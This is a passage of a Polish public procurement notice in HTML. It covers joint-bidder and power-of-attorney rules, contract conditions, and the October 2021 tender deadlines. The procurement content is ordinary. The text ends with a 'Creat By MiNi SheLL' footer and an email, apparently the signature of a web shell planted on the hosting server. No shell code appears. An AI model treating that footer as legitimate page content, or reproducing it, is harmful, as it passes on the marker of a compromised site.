udzielenie zamówienia w Postępowaniu albo do reprezentowania w Postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (dotyczy wyłącznie wykonawców wspólnie ubiegających się o udzielenie zamówienia),<br/>3)	oświadczenie, o którym mowa w art. 117 ust. 4 P.z.p. (dotyczy wyłącznie wykonawców wspólnie ubiegających się o udzielenie zamówienia, w przypadku, o którym mowa w art. 117 ust. 2 i 3 P.z.p.) – wzór oświadczenia wykonawców wspólnie ubiegających się o zamówienie – załącznik nr 7 do SWZ,<br/>4)	zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 P.z.p., spełniające wymogi, o których mowa w art. 118 ust. 4 P.z.p. (dotyczy wyłącznie Wykonawcy, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby) – wzór zobowiązania podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia – załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Dokument pełnomocnictwa powinien:<br/>1)	określać postępowanie o udzielenie zamówienia, którego dotyczy,<br/>2)	wymieniać Wykonawców ubiegających się wspólnie o udzielenie zamówienia (mocodawców),<br/>3)	określać osobę pełnomocnika oraz zakres jego umocowania.<br/>3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne.<br/>4.	Pełnomocnictwo powinno zostać złożone w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym. W przypadku gdy oryginalne pełnomocnictwo, zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa w zdaniu poprzednim dokonuje mocodawca.<br/>5.	Wszelka korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako pełnomocnik, na adres wskazany do korespondencji.<br/>6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie znajdujących zastosowanie w Postępowaniu przesłanek wykluczenia.<br/>7.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o którym mowa w § 1 ust. 1 pkt 2 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, Dz.U. z 2020 r. poz. 2415, składa każdy z Wykonawców - Załącznik nr 6 do SWZ - Oświadczenie w sprawie przynależności do tej samej grupy kapitałowej.<br/>8.	Wykonawcy wspólnie ubiegający się o zamówienie, w sytuacjach o których mowa w art. 117 ust. 4 ustawy P.z.p. do oferty załączają oświadczenie, o którym mowa w tym przepisie.<br/>9.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia zostanie wybrana, Wykonawcy zobowiązani są przedłożyć Zamawiającemu przed zawarciem umowy w sprawie niniejszego zamówienia, umowę regulującą swoją współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi Załącznik Nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">3. Komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji) a także poczty elektronicznej, przy zastrzeżeniu, że oferta musi zostać złożona za pośrednictwem miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com